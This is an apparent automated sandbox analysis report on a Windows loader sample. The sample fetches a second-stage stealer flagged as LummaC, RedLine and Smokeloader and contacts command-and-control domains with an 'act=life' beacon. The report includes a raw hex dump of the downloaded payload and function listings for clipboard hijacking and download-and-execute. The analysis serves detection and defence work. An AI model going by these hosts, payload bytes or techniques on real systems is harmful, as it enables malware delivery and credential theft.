Dec 17, 2024 08:18:42.512564898 CET	85	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.19
Dec 17, 2024 08:18:43.838874102 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:18:43 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Tue, 17 Dec 2024 07:15:01 GMT ETag: "5a000-629720e372f3a" Accept-Ranges: bytes Content-Length: 368640 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4f 13 29 12 0b 72 47 41 0b 72 47 41 0b 72 47 41 b6 3d d1 41 0a 72 47 41 15 20 c3 41 15 72 47 41 15 20 d2 41 1f 72 47 41 15 20 c4 41 65 72 47 41 2c b4 3c 41 0c 72 47 41 0b 72 46 41 7d 72 47 41 15 20 cd 41 0a 72 47 41 15 20 d3 41 0a 72 47 41 15 20 d6 41 0a 72 47 41 52 69 63 68 0b 72 47 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 67 98 24 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 fa 03 00 00 26 3f 00 00 00 00 00 77 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 43 00 00 04 00 00 91 97 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$O)rGArGArGA=ArGA ArGA ArGA AerGA,<ArGArFA}rGA ArGA ArGA ArGARichrGAPELg$f&?w@ C)<B.text `.rdata#$@@.data=@p"@.rsrcB@@
Dec 17, 2024 08:18:43.838948965 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 24 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 6c 08 00 00 6a 0c 68 e0 25 44 00 e8 97 16 00 00 8b 75 08 85 f6 74 75 83 3d Data Ascii: %$D;@Duljh%Dutu=uCjYeVYEtVPYYE}u7ujrYVj5TnDDu=DPY[UQeVEPuu
Dec 17, 2024 08:18:43.839030027 CET	1236	IN	Data Raw: e8 ef 17 00 00 8b f0 83 c4 0c 85 f6 75 18 39 45 fc 74 13 e8 f9 08 00 00 85 c0 74 0a e8 f0 08 00 00 8b 4d fc 89 08 8b c6 5e c9 c3 6a 0c 68 00 26 44 00 e8 c9 15 00 00 83 65 e4 00 8b 75 08 3b 35 a4 b4 81 00 77 22 6a 04 e8 b9 0a 00 00 59 83 65 fc 00 Data Ascii: u9EttM^jh&Deu;5w"jYeVYEEEjYUVuSW=D=TnDuSjhYYut3@PuVSYuuFVj5TnD
Dec 17, 2024 08:18:43.839153051 CET	1236	IN	Data Raw: 05 33 c0 66 89 06 8b 45 08 85 c0 74 03 83 08 ff e8 28 04 00 00 80 7d fc 00 8b 00 0f 84 ba 00 00 00 8b 4d f8 83 61 70 fd e9 ae 00 00 00 8d 45 f0 50 0f b6 03 50 e8 41 31 00 00 59 59 85 c0 74 5a 8b 4d f0 8b 81 ac 00 00 00 39 45 0c 73 1a 8a 03 88 07 Data Ascii: 3fEt(}MapEPPA1YYtZM9EsE7,~3RVPSjqDP{FU33GPEVWSjpD4E8E;t3_UQMES]Vt
Dec 17, 2024 08:18:43.839165926 CET	1236	IN	Data Raw: 68 a0 0f 00 00 ff 30 83 c7 18 e8 b0 36 00 00 59 59 85 c0 74 0c 46 83 fe 24 7c d2 33 c0 40 5f 5e c3 83 24 f5 88 41 44 00 00 33 c0 eb f1 8b ff 53 8b 1d d4 10 44 00 56 be 88 41 44 00 57 8b 3e 85 ff 74 13 83 7e 04 01 74 0d 57 ff d3 57 e8 63 f5 ff ff Data Ascii: h06YYtF$\|3@_^$AD3SDVADW>t~tWWc&YBD\|AD_t~uPBD\|^[UE4ADD]jh&D3G}39TnDujh!YYu4AD9tnj5 Y;uu
Dec 17, 2024 08:18:43.839231014 CET	672	IN	Data Raw: 5e c9 c3 a1 ac b4 81 00 56 8b 35 9c b4 81 00 57 33 ff 3b f0 75 34 83 c0 10 6b c0 14 50 ff 35 a0 b4 81 00 57 ff 35 54 6e 44 00 ff 15 e4 10 44 00 3b c7 75 04 33 c0 eb 78 83 05 ac b4 81 00 10 8b 35 9c b4 81 00 a3 a0 b4 81 00 6b f6 14 03 35 a0 b4 81 Data Ascii: ^V5W3;u4kP5W5TnDD;u3x5k5hAj5TnDDF;tjh hWDF;uvW5TnDDN>~F_^UQQMASVqW3C}i0Dj?EZ@@Juj
Dec 17, 2024 08:18:43.839241982 CET	1236	IN	Data Raw: 00 8b 7d fc 8b 4d 0c c1 ff 04 4f 8d 4c 31 fc 83 ff 3f 76 03 6a 3f 5f 8b 5d f4 8d 1c fb 89 5d 10 8b 5b 04 89 59 04 8b 5d 10 89 59 08 89 4b 04 8b 59 04 89 4b 08 8b 59 04 3b 59 08 75 57 8a 4c 07 04 88 4d 13 fe c1 88 4c 07 04 83 ff 20 73 1c 80 7d 13 Data Ascii: }MOL1?vj?_]][Y]YKYKY;YuWLML s}uMDD }uOMYOUMD2LUFBD2<38/])uNK\3uN]K?vj?^E
Dec 17, 2024 08:18:43.839261055 CET	1236	IN	Data Raw: 8b 4d fc 89 08 8d 42 04 5f 5e 5b c9 c3 cc cc cc 68 20 27 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 04 40 44 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 Data Ascii: MB_^[h '@d5D$l$l$+SVW@D1E3PeuEEEEdMdY__^[]QUS]Vs35@DWEE{tN38NF38E@fMUS[EMt_I[LD
Dec 17, 2024 08:18:43.839272022 CET	1236	IN	Data Raw: 00 ff 35 8c b4 81 00 e8 d3 0a 00 00 59 8b f8 89 7d d8 85 ff 74 78 ff 35 88 b4 81 00 e8 be 0a 00 00 59 8b f0 89 75 dc 89 7d e4 89 75 e0 83 ee 04 89 75 dc 3b f7 72 57 e8 9a 0a 00 00 39 06 74 ed 3b f7 72 4a ff 36 e8 94 0a 00 00 8b f8 e8 84 0a 00 00 Data Ascii: 5Y}tx5Yu}uu;rW9t;rJ65~5q9}u9Et}}Eu}hDD_YhDDOYE}u(oDjYu3C}tjYU
Dec 17, 2024 08:18:43.839282990 CET	1236	IN	Data Raw: 0c 00 80 00 00 59 5d c3 8b 45 0c 83 c0 20 50 ff 15 dc 10 44 00 5d c3 8b ff 55 8b ec 8b 45 08 b9 68 43 44 00 3b c1 72 1f 3d c8 45 44 00 77 18 81 60 0c ff 7f ff ff 2b c1 c1 f8 05 83 c0 10 50 e8 50 ea ff ff 59 5d c3 83 c0 20 50 ff 15 d8 10 44 00 5d Data Ascii: Y]E PD]UEhCD;r=EDw`+PPY] PD]UME}`Q!Y] PD]UVuW3;uWWWWWF@t FFuV;6YFvvV
Dec 17, 2024 08:18:43.959095001 CET	1236	IN	Data Raw: bc fd ff ff 9c 8f 85 f0 fd ff ff 8b 45 04 8d 4d 04 c7 85 30 fd ff ff 01 00 01 00 89 85 e8 fd ff ff 89 8d f4 fd ff ff 8b 49 fc 89 8d e4 fd ff ff c7 85 d8 fc ff ff 17 04 00 c0 c7 85 dc fc ff ff 01 00 00 00 89 85 e4 fc ff ff ff 15 c8 10 44 00 6a 00 Data Ascii: EM0IDjD(PDuujnYhDPDM3[NU5sDYt]j/Y]UV5,FD5Dt!(FDtP5,FDt

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.56.70	443	4724	C:\Users\user\Desktop\DG55Gu1yGM.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:18:41 UTC	90	OUT	GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
2024-12-17 07:18:42 UTC	806	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:18:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m8mNwvHdJWmDx%2B5pye43LmeidpVk04aRcQUntQEkvwnB6LkGAB3aOofqWRrGX%2BB47XzYZcxB5p2BprJM44VYH9I99Hn9B2k%2F1Mxp5YW%2Fr%2Bj9%2B6pCnFgGpTQtZ2NbWGNfmA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3523ffec0aefa7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1945&min_rtt=1941&rtt_var=737&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=728&delivery_rate=1476238&cwnd=161&unsent_bytes=0&cid=c979b3785aa00078&ts=653&x=0"
2024-12-17 07:18:42 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-17 07:18:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	104.131.68.180	443	5064	C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:18:49 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: immureprech.biz
2024-12-17 07:18:49 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-17 07:18:50 UTC	94	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:18:50 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49708	45.77.249.79	443	5064	C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:18:52 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: deafeninggeh.biz
2024-12-17 07:18:52 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-17 07:18:53 UTC	94	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:18:52 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49715	104.121.10.34	443	5064	C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:18:56 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-17 07:18:56 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 17 Dec 2024 07:18:56 GMT Content-Length: 25665 Connection: close Set-Cookie: sessionid=962e3ca250d10fc8fbc2ea3a; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-17 07:18:56 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-17 07:18:57 UTC	11186	IN	Data Raw: 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 74 68 61 69 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 68 61 69 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e0 b9 84 e0 b8 97 e0 b8 a2 20 28 54 68 61 69 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: ?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a><a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a>

Target ID:	0
Start time:	02:18:38
Start date:	17/12/2024
Path:	C:\Users\user\Desktop\DG55Gu1yGM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DG55Gu1yGM.exe"
Imagebase:	0x400000
File size:	499'712 bytes
MD5 hash:	F5F01C71D9AD196656CDCEEF7C1F12E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4557098712.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	02:18:44
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe"
Imagebase:	0x400000
File size:	368'640 bytes
MD5 hash:	2C0A5976C7D6D86506EB825C8D67A8B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.2550594932.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000003.2195992842.0000000002500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:18:56
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 1636
Imagebase:	0x810000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	24.5%
Signature Coverage:	6.8%
Total number of Nodes:	637
Total number of Limit Nodes:	19

Executed Functions

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004016E6
Sleep.KERNEL32(00001541,0000004C), ref: 004016F0

Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27

OpenClipboard.USER32(00000000), ref: 0040171D
GetClipboardData.USER32(00000001), ref: 0040172D
GlobalLock.KERNEL32(00000000), ref: 0040173C
_strlen.LIBCMT ref: 00401749
_strlen.LIBCMT ref: 00401778
_strlen.LIBCMT ref: 004018BC
EmptyClipboard.USER32 ref: 004018D2
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
GlobalLock.KERNEL32(00000000), ref: 004018FD
GlobalUnlock.KERNEL32(00000000), ref: 00401909
SetClipboardData.USER32(00000001,00000000), ref: 00401912
GlobalFree.KERNEL32(00000000), ref: 00401919
CloseClipboard.USER32 ref: 0040193D
Sleep.KERNEL32(000002D2), ref: 00401948

Strings

i, xrefs: 00401759

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: i
API String ID: 1583243082-3865851505
Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
CloseHandle.KERNEL32(00000000), ref: 00402B07
ShellExecuteExW.SHELL32(?), ref: 00402B68
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
CloseHandle.KERNEL32(?), ref: 00402B89
InternetCloseHandle.WININET(00000000), ref: 00402B92
InternetCloseHandle.WININET(00000000), ref: 00402B95

Strings

.exe, xrefs: 00402A6B
ShareScreen, xrefs: 00402A12
<, xrefs: 00402B45

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen
API String ID: 3323492106-493228180
Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4

Function 004B07A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 004B07CE
Module32First.KERNEL32(00000000,00000224), ref: 004B07EE

Memory Dump Source

Source File: 00000000.00000002.4557098712.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b0000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 0ee5d2996cb4697eab9abdc46cf28c4c5ec05b61019354676a638acd7f008353
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: E2F062311017116FD7203AB5988DAAFB7ECAF49766F10056AE642911C0DE78F8454A75

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

GetLastError.KERNEL32 ref: 0043D150
__dosmaperr.LIBCMT ref: 0043D157
GetFileType.KERNEL32(00000000), ref: 0043D163
GetLastError.KERNEL32 ref: 0043D16D
__dosmaperr.LIBCMT ref: 0043D176
CloseHandle.KERNEL32(00000000), ref: 0043D196
CloseHandle.KERNEL32(?), ref: 0043D2E0
GetLastError.KERNEL32 ref: 0043D312
__dosmaperr.LIBCMT ref: 0043D319

Strings

H, xrefs: 0043D29E

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

Function 0212003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0212024D

Strings

kernel32.dll, xrefs: 0212008F, 02120095
cess, xrefs: 0212018D

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 6307871ac7b424446d8f48e480cf3fe90682051c211dfdc8c527356dcb06ef3a
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 61526A74A01229DFDB64CF58C984BACBBB1BF09304F1581D9E54DAB351DB30AA99CF14

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
InternetCloseHandle.WININET(00000000), ref: 00402E4B
InternetCloseHandle.WININET(00000000), ref: 00402E4E

Strings

ShareScreen, xrefs: 00402C22
https://post-to-me.com/track_prt.php?sub=, xrefs: 00402C57, 00402D83, 00402DF2
&cc=DE, xrefs: 00402DB4, 00402DBA, 00402E17

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Internet$CloseHandleOpen_wcslen
String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
API String ID: 3067768807-1501832161
Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 004051E4
__Mtx_init.LIBCPMT ref: 0040520A
std::_Cnd_initX.LIBCPMT ref: 0040522D
